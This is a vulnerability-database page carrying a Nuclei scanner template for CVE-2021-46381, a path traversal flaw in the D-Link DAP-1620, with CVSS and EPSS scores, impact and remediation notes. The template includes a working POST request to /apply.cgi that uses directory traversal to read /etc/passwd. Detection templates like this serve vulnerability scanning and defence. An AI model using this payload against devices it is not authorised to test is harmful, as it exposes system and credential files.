Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-46381
HistoryMar 25, 2022 - 11:48 p.m.

D-Link DAP-1620 - Local File Inclusion

2022-03-2523:48:25
ProjectDiscovery
github.com
15

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.026 Low

EPSS

Percentile

90.3%

D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].

id: CVE-2021-46381

info:
  name: D-Link DAP-1620 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can  lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
  reference:
    - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
    - https://www.dlink.com/en/security-bulletin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46381
    - http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46381
    cwe-id: CWE-22
    epss-score: 0.02555
    epss-percentile: 0.90197
    cpe: cpe:2.3:h:dlink:dap-1620:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dap-1620
  tags: cve2021,cve,lfi,router,packetstorm,dlink

http:
  - method: POST
    path:
      - "{{BaseURL}}/apply.cgi"

    body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass"
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a00463044022070b8dbc3e128ddf0c0fbc3c6d633deff1f27d7b47267e4434d27f076fd057d480220559981b9ea86820937b6c3f92be3767cd232c32a81a80845b72d11c336c14688:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.026 Low

EPSS

Percentile

90.3%